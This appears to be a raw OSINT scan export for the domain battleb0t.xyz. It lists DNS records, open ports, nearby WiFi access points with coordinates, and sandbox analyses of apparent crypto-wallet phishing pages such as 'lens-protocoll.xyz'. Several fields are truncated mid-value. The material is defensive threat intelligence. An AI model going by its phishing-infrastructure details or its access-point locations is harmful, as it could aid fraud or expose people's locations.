u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.google.com/support/translate+(en==Hn?:#googtrans/en/+Hn);var"\n Pattern match: "https://www.google.com/tools/feedback},Tw=function(a){return"\n Pattern match: "https://github.com/madler/zlib/blob/master/zlib.h"\n Pattern match: "https://www.google.com/images/cleardot.gif"\n Pattern match: "https://==Pn?V.Gh:null};this.Z={qb:Un,xd:null};a&&"\n Pattern match: "V.Pb/\ufffd\u0331"\n Pattern match: "http://fontawesome.io"\n Pattern match: "http://fontawesome.io/license"\n Pattern match: "http://jquery.com/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://sizzlejs.com/"\n Pattern match: "https://www&google.com/images/zippy_minus_sm.gif"\n Pattern match: "http://www.w3.org/TR/selectors/#attribute-selectors"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#attribute-selectors"\n Pattern match: "https://developer.mozilla.org/en/Security/CSP"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#escaped-characters"\n Pattern match: "http://bugs.jquery.com/ticket/12282#comment:15"\n Pattern match: "http://blindsignals.com/index.php/2009/07/jquery-delay/"\n Pattern match: "http://bugs.jquery.com/ticket/12359"\n Pattern match: "http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291"\n Pattern match: "http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/"\n Pattern match: "http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_AVAILABLE)"\n Pattern match: "http://javascript.nwbox.com/IEContentLoaded/"\n Pattern match: "http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx"\n Pattern match: "http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context"\n Pattern match: "http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html"\n Pattern match: "http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked"\n Pattern match: "http://www.w3.org/TR/css3-syntax/#characters"\n Pattern match: "http://www.w3.org/TR/selectors/#empty-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#lang-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#pseudo-classes"\n Pattern match: "https://github.com/jquery/jquery/pull/764"\n Pattern match: "http://json.org/json2.js"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=491668"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier"\n Pattern match: "https://developer.mozilla.org/en-US/docs/CSS/display"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=649285"\n Pattern match: "http://dev.w3.org/csswg/cssom/#resolved-values"\n Pattern match: "http://jsperf.com/getall-vs-sizzle/2"\n Pattern match: "https://bugs.webkit.org/show_bug.cgi?id=29084"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#whitespace"\n Pattern match: "https://bafybeia3mpocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a.ipfs.dweb.link/"\n Pattern match: "https://translate.google.com/translate_a/element.js?cb=gtElInit&hl=en-US&client=wt"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/exm=corsproxy/ed=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=navigationui"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=corsproxy"\n Pattern match: "https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog\\]]],null,null,null,null,null,null,-3600,null,null,null,null,[],1,nu |
| 2023-05-12 03:03:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 1 | 0 | 3 | 0 | None | 007316.xyz | 007316.xyz |
| 2023-05-12 03:23:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.6:8080 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:22 | 87.248.157.102 |
| 2023-05-12 02:52:41 | Raw Data from RIRs | No | Hybrid Analysis | 3 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/walletconnect/walletconnect-monorepo/releases/download/1.7.8/web3-provider.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/js/modal.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/jkup/focusable/blob/master/index.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://lens-protocoll.xyz/webc/index.php', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_588_IESQMMUTEX_0_519"\n "IsoScope_588_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_588_IESQMMUTEX_0_331"\n "IsoScope_588_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1416"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_588_ConnHashTable<1416>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_588_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.70:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "65.8.158.85:443"\n "151.101.1.229:443"\n "104.16.123.175:443"\n "192.30.255.113:443"\n "185.199.108.153:443"\n "185.199.108.133:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.ethers.io"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "etherum-libs.github.io"\n "github.com"\n "lens-protocoll.xyz"\n "objects.githubusercontent.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="Keywords" content="Lens Protocol - Claiming App\n Lens Protocol - Claiming App a paypal\n Lens Protocol - Claiming App a binance\n Lens Protocol - Claiming App harmony"/>" (Indicator: "dir "; File: "urlref_httpslens-protocoll.xyzwebcindex.php")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"(0, properties_1.defineReadOnly)(this, "publicKey", signingKey.compressedPublicKey);" (Source: jqueryjs_1_.js, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dffb9a278b09a9867d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{64fca9ab-eac7-11ed-8a3e-080027a190c2}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"b38d7abaf0f5f8fb484f9be1484e98a17ea16df2_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f0438febff768476c4bd646204034239a5fc20d9_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f9fa0444b908def7e2cacce9c162c39a60167a27_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "jqueryjs_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3.min_1_.js" has type "data"- [targetUID: N/A]\n "slider_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3-provider.min_1_.js" has type "data"- [targetUID: N/A]\n "ethers-5.2.umd.min_1_.js" has type "data"- [targetUID: N/A]\n "walletbundle_1_.js" has type "UTF-8 Unicode text with very long lines with escape sequences"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ethereumjs-tx-1.3.3.min_1_.js" has type "data"- [targetUID: N/A]\n "urlref_httpslens-protocoll.xyzwebcindex.php" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "index_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "sweetalert2.all_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001416]\n "invisible_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "main.34d2eea7_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "axios.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ABI_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001416]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF038CF0017F8B478D.TMP" has type "data"- Location: [%TEMP%\\~DF038CF0017F8B478D.TMP]- [targetUID: 00000000-00001416]\n "~DFFB9A278B09A9867D.TMP" has type "data"- Location: [%TEMP%\\~DFFB9A278B09A9867D.TMP]- [targetUID: 00000000-00001416]\n "~DF79C8B99757FDF652.TMP" has type "data"- Location: [%TEMP%\\~DF79C8B99757FDF652.TMP]- [targetUID: 00000000-00001416]\n "~DF3E2144E69F260778.TMP" has type "data"- Location: [%TEMP%\\~DF3E2144E69F260778.TMP]- [targetUID: 00000000-00001416]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "css2_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_64FCA9AB-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._64FCA9A9-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6E587A84-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "inter_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.cookie.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "C1TXDP2K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1TXDP2K.txt]- [targetUID: 00000000-00001416]\n "NN4OYYV3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NN4OYYV3.txt]- [targetUID: 00000 | 185.199.108.153 |
| 2023-05-12 02:56:36 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220', u'54.196.16.164'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://hilarious-kelpie-473db1.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd"\n "www.herokucdn.com"\n "o.ss2.us"\n "crl.rootg2.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "crl.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d00_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_d00_ConnHashTable<3328>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d00_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d00_IESQMMUTEX_0_519"\n "IsoScope_d00_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3328"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d00_IE_EarlyTabStart_0x424_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "54.196.16.164:80"\n "99.84.238.168:80"\n "99.84.238.168:443"\n "99.84.224.224:80"\n "99.84.224.90:80"\n "99.84.224.108:80"\n "99.84.224.214:80"\n "99.84.224.3:80"\n "99.84.224.217:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"TR7K5OKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TR7K5OKT.txt]- [targetUID: 00000000-00003328]\n "73DA0AE306CF69ADAC457DB6B2997338" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\73DA0AE306CF69ADAC457DB6B2997338]- [targetUID: 00000000-00001732]\n "~DFC7FE55AAA15340B0.TMP" has type "data"- Location: [%TEMP%\\~DFC7FE55AAA15340B0.TMP]- [targetUID: 00000000-00003328]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00003328]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00003328]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00001732]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00001732]\n "2C9HMCBU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2C9HMCBU.txt]- [targetUID: 00000000-00003328]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003328]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00001732]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00001732]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003328]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003328]\n "BCB67D7ECB470284AF35679F339E879F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BCB67D7ECB470284AF35679F339E879F]- [targetUID: 00000000-00001732]\n "~DF9154BC8BBA72FEBA.TMP" has type "data"- Location: [%TEMP%\\~DF9154BC8BBA72FEBA.TMP]- [targetUID: 00000000-00003328]\n "FVK5E2PX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FVK5E2PX.txt]- [targetUID: 00000000-00003328]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003328]\n "~DF4D25D5B6C6F1C182.TMP" has type "data"- Location: [%TEMP%\\~DF4D25D5B6C6F1C182.TMP]- [targetUID: 00000000-00003328]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd" seems to be random\n "www.herokucdn.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://hilarious-kelpie-473db1.netlify.app/"- [Source: Input]\n Pattern match: "https://hilarious-kelpie-473db1.netlify.app"- [Source: Input]\n Pattern match: "www.herokucdn.com"- [Source: PCAP]\n Pattern match: "http://unsub1.cfd/"- [Source: PCAP]\n Heuristic match: "o.ss2.us"- [Source: PCAP]\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"- [Source: PCAP]\n Heuristic match: "crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootg2.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootca1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEA11CXliCX0s5ZbPbTWItcU%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "crl.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /sca1b-1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.sca1b.amazontrust.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_ | 104.196.30.220 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-003
(Net ID: 00:07:0E:65:CF:39) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:45:51 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Montreal', u'security': {u'is_vpn': False}, u'city_geoname_id': 6077243, u'region_geoname_id': 6115047, u'country': u'United States', u'region': u'Quebec', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'H4X', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:50'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:4700:3031::6815:6a6', u'continent': u'North America', u'region_iso_code': u'QC'} | 2606:4700:3031::6815:6a6 |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | CN=*.battleb0t.xyz |
| 2023-05-12 02:55:28 | Physical Location | No | URLScan.io | 0 | 0 | 2 | 0 | None | DE | kekw.battleb0t.xyz |
| 2023-05-12 03:03:24 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0000-bigtree.github.io |
| 2023-05-12 02:45:34 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | battleb0t.xyz. 300 IN MX 21 route2.mx.cloudflare.net.
battleb0t.xyz. 300 IN MX 60 route3.mx.cloudflare.net.
battleb0t.xyz. 300 IN MX 68 route1.mx.cloudflare.net. | battleb0t.xyz |
| 2023-05-12 03:17:56 | Malicious IP on Same Subnet | Yes | CINS Army List | 0 | 0 | 4 | 0 | None | cinsscore.com [64.226.80.0/20]
http://cinsscore.com/list/ci-badguys.txt | 64.226.80.0/20 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE630 (Net ID: 00:02:2D:23:E0:24) | 37.7642, -122.3993 |
